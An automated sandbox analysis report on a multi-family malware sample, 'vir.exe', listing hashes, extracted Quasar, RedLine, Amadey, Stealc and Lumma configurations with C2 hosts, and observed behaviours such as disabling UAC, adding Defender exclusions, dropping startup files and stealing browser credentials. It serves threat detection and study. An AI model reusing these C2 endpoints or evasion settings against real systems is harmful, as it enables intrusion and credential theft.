Resubmissions
26-12-2024 15:01
241226-sec6vayjgx 1027-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 1015-08-2024 22:57
240815-2w8thszepa 10Analysis
-
max time kernel
231s -
max time network
211s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
29-07-2024 19:25
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
vir.exe
Resource
win10v2004-20240709-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
51.195.145.80:14640
Extracted
amadey
4.41
0657d1
http://185.215.113.19
-
install_dir
0d8f5eb8a7
-
install_file
explorti.exe
-
strings_key
6c55a5f34bb433fbd933a168577b1838
-
url_paths
/Vi9leo/index.php
Extracted
stealc
dana
http://85.28.47.31
-
url_path
/5499d72b3a3e55be.php
Extracted
lumma
https://clearrypalsidn.shop/api
https://horizonvxjis.shop/api
https://effectivedoxzj.shop/api
https://parntorpkxzlp.shop/api
https://stimultaionsppzv.shop/api
https://grassytaisol.shop/api
https://broccoltisop.shop/api
https://shellfyyousdjz.shop/api
https://bravedreacisopm.shop/api
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral2/files/0x000700000002345e-206.dat family_umbral behavioral2/files/0x00070000000235d2-4190.dat family_umbral behavioral2/memory/5388-4198-0x0000021B0E3F0000-0x0000021B0E430000-memory.dmp family_umbral -
Modifies firewall policy service 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 6eoK9cmGaTaMPDXJDZ5cDxGS.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x000700000002345a-202.dat family_quasar behavioral2/memory/6724-3491-0x0000000000F00000-0x0000000001224000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/8696-4950-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exe = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 6eoK9cmGaTaMPDXJDZ5cDxGS.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 84 2680 mshta.exe 84 2680 mshta.exe -
pid Process 4628 powershell.exe 8604 powershell.exe 9116 powershell.exe 7052 powershell.exe 7468 powershell.exe 8348 powershell.exe 4572 powershell.exe -
Downloads MZ/PE file
-
Manipulates Digital Signatures 1 TTPs 2 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\243EB40AEEB0932F7795187E2F1B203340B54C51\Blob = 0f000000010000001400000042e1350df3355f02a9ac2de7fdfe00dd543b48dd0200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000370032003500350035003100390033002d0039003000350062002d0034006100640065002d0061006600620037002d0037003500640061006400320036003300610036006300390000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000243eb40aeeb0932f7795187e2f1b203340b54c51200000000100000000030000308202fc308201e4a003020102021011d647ba7ee1eda0499cf0ec68c738e5300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303732393139333231325a180f32313234303730353139333231325a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a432fc13f1deb521c79e5ed240485287c4cb875a991777fa783fc7f7d0204bccf36d279c123a07d7cd9e109dc9337105425f324055dc5ed5da2760f29781750e6df65c5bd0b620f1f291ead74040072f940859bea363dbae1e8b807898c9413ad4c0757b660244874b8a2cf60ea6781ffa399c5c1b40fe8febb68320953ce98ac12f2934e3cd0e8e9430e9602a05b7dcde20a7518f6833f5e1fd3f6e8ff78fb1c6d09bd14ae857b3da206833ba27d7e90278f4406dfeea4c89f5cc88d8a878a0b7778db9c6c2baeda001b02bd9e0ead2e92b636f6d6b4a988fc9ff1c99cdeb905e78e340ad60d73ac578ce4890989ede130f38719a1b9967ce467f0bd776a2b50203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404c4147594c58414f0030090603551d1304023000300d06092a864886f70d0101050500038201010077a4a845bbd287cb3c49d6dd40aaad7ef445c13b06537b51c9b07d8a0c49432bf5fa0bd62eb6e78ecacf9a9bdc532d271afd1934bf647dd05224ab7bcd5044ebe4d0fff6da37357b27376cbfc6e0919ba86a035923f42a3f2275007d46d703e40495099077c0a8e8b60641bbc10891000888cc7c96609945c943dfae0abcccfd617afc06aadd8620df0208665332feddb1544fd0bb65611614a0af6ff6b818d17fe7ebc1ce036703ccd8300dc09327f7f51853e45220a4d867e31a6a1ad9ef6d7f91e8cfbdbc9d6363cf34a1f83f79fc4cf7b6ea3fdb8b55aea7be6dae1d491f3f40e52528edcb11442cdac98f491882ed0ac202ad972b7b44f674b9b32018a1 msedge.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\243EB40AEEB0932F7795187E2F1B203340B54C51\Blob = 0f000000010000001400000042e1350df3355f02a9ac2de7fdfe00dd543b48dd030000000100000014000000243eb40aeeb0932f7795187e2f1b203340b54c51200000000100000000030000308202fc308201e4a003020102021011d647ba7ee1eda0499cf0ec68c738e5300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303732393139333231325a180f32313234303730353139333231325a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a432fc13f1deb521c79e5ed240485287c4cb875a991777fa783fc7f7d0204bccf36d279c123a07d7cd9e109dc9337105425f324055dc5ed5da2760f29781750e6df65c5bd0b620f1f291ead74040072f940859bea363dbae1e8b807898c9413ad4c0757b660244874b8a2cf60ea6781ffa399c5c1b40fe8febb68320953ce98ac12f2934e3cd0e8e9430e9602a05b7dcde20a7518f6833f5e1fd3f6e8ff78fb1c6d09bd14ae857b3da206833ba27d7e90278f4406dfeea4c89f5cc88d8a878a0b7778db9c6c2baeda001b02bd9e0ead2e92b636f6d6b4a988fc9ff1c99cdeb905e78e340ad60d73ac578ce4890989ede130f38719a1b9967ce467f0bd776a2b50203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404c4147594c58414f0030090603551d1304023000300d06092a864886f70d0101050500038201010077a4a845bbd287cb3c49d6dd40aaad7ef445c13b06537b51c9b07d8a0c49432bf5fa0bd62eb6e78ecacf9a9bdc532d271afd1934bf647dd05224ab7bcd5044ebe4d0fff6da37357b27376cbfc6e0919ba86a035923f42a3f2275007d46d703e40495099077c0a8e8b60641bbc10891000888cc7c96609945c943dfae0abcccfd617afc06aadd8620df0208665332feddb1544fd0bb65611614a0af6ff6b818d17fe7ebc1ce036703ccd8300dc09327f7f51853e45220a4d867e31a6a1ad9ef6d7f91e8cfbdbc9d6363cf34a1f83f79fc4cf7b6ea3fdb8b55aea7be6dae1d491f3f40e52528edcb11442cdac98f491882ed0ac202ad972b7b44f674b9b32018a1 msedge.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 8564 netsh.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 6556 icacls.exe 6244 takeown.exe 7384 icacls.exe 6628 takeown.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/2748-248-0x0000000005EE0000-0x0000000006430000-memory.dmp net_reactor behavioral2/memory/2748-249-0x00000000069E0000-0x0000000006F2E000-memory.dmp net_reactor behavioral2/memory/2748-250-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-253-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-261-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-259-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-265-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-263-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-271-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-272-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-279-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-286-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-284-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-326-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-322-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-328-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-320-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-318-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-316-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-305-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-315-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-303-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-301-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-299-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-295-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-288-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-297-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-282-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-281-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-277-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-274-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-267-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-257-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-251-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor behavioral2/memory/2748-255-0x00000000069E0000-0x0000000006F29000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation vir.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation 6eoK9cmGaTaMPDXJDZ5cDxGS.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Romilyaa.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xqfhIBLcow03UtXSzFluBTfl.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ruteymsUDC4fJPGB6TQGZ3zX.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jiaMQhbcPj97ifWAfHPgMs8M.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k2nK6ys8h9T3qwp8WsbAKDrX.bat jsc.exe -
Executes dropped EXE 20 IoCs
pid Process 1568 ProgressBarSplash.exe 2748 Rover.exe 1052 Google.exe 1928 regmess.exe 6092 1.exe 4588 3.exe 1992 WinaeroTweaker-1.40.0.0-setup.exe 5440 WinaeroTweaker-1.40.0.0-setup.tmp 6724 scary.exe 6732 the.exe 6820 wimloader.dll 7000 Romilyaa.exe 6196 ac3.exe 6508 Romilyaa.exe 7832 Romilyaa.exe 7736 lx26s09UlZjAOugX3CvKdnQ3.exe 1592 SWjzRG7RCalw924ufm5qL0sx.exe 5776 6eoK9cmGaTaMPDXJDZ5cDxGS.exe 6628 Romilyaa.exe 3512 Romilyaa.exe -
Indirect Command Execution 1 TTPs 3 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 8276 forfiles.exe 5280 forfiles.exe 1724 forfiles.exe -
Loads dropped DLL 4 IoCs
pid Process 6092 1.exe 6092 1.exe 6092 1.exe 5440 WinaeroTweaker-1.40.0.0-setup.tmp -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 6628 takeown.exe 6556 icacls.exe 6244 takeown.exe 7384 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000700000002344a-174.dat upx behavioral2/files/0x000700000002346b-222.dat upx behavioral2/memory/4588-3408-0x0000000000B90000-0x00000000021B7000-memory.dmp upx behavioral2/memory/4588-3480-0x0000000000B90000-0x00000000021B7000-memory.dmp upx behavioral2/memory/6244-4124-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral2/memory/6244-4292-0x0000000000400000-0x000000000083E000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 6eoK9cmGaTaMPDXJDZ5cDxGS.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
flow ioc 238 raw.githubusercontent.com 249 raw.githubusercontent.com 255 raw.githubusercontent.com 305 discord.com 306 discord.com 145 pastebin.com 243 raw.githubusercontent.com 254 raw.githubusercontent.com 143 pastebin.com 150 raw.githubusercontent.com 148 raw.githubusercontent.com 248 raw.githubusercontent.com 242 raw.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 164 ipinfo.io 165 ipinfo.io 160 api.myip.com 161 api.myip.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023449-121.dat autoit_exe behavioral2/files/0x0007000000023443-169.dat autoit_exe behavioral2/files/0x000700000002344f-184.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy 6eoK9cmGaTaMPDXJDZ5cDxGS.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 6eoK9cmGaTaMPDXJDZ5cDxGS.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 6eoK9cmGaTaMPDXJDZ5cDxGS.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 6eoK9cmGaTaMPDXJDZ5cDxGS.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1000 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 436 set thread context of 7512 436 powershell.exe 244 -
Drops file in Program Files directory 20 IoCs
description ioc Process File created C:\Program Files\Winaero Tweaker\is-HVLAK.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-N7PF8.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-RRDV0.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-FUJN0.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-1ODSJ.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-42G9D.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-URAE5.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-VQB0S.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-JK9SM.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-7E3SC.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023628-4582.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 6200 4588 WerFault.exe 165 7408 1592 WerFault.exe 259 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lx26s09UlZjAOugX3CvKdnQ3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regmess.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wimloader.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWjzRG7RCalw924ufm5qL0sx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ProgressBarSplash.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 20 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7024 PING.EXE 5144 PING.EXE 3760 PING.EXE 6212 PING.EXE 6352 PING.EXE 6200 PING.EXE 8092 PING.EXE 6096 PING.EXE 1772 PING.EXE 4776 PING.EXE 456 PING.EXE 8832 PING.EXE 9148 PING.EXE 8996 cmd.exe 8380 PING.EXE 640 PING.EXE 5460 PING.EXE 6412 PING.EXE 1708 PING.EXE 9032 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023469-220.dat nsis_installer_1 behavioral2/files/0x0007000000023469-220.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SWjzRG7RCalw924ufm5qL0sx.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SWjzRG7RCalw924ufm5qL0sx.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SWjzRG7RCalw924ufm5qL0sx.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 3544 timeout.exe 7612 timeout.exe 7460 timeout.exe 7532 timeout.exe -
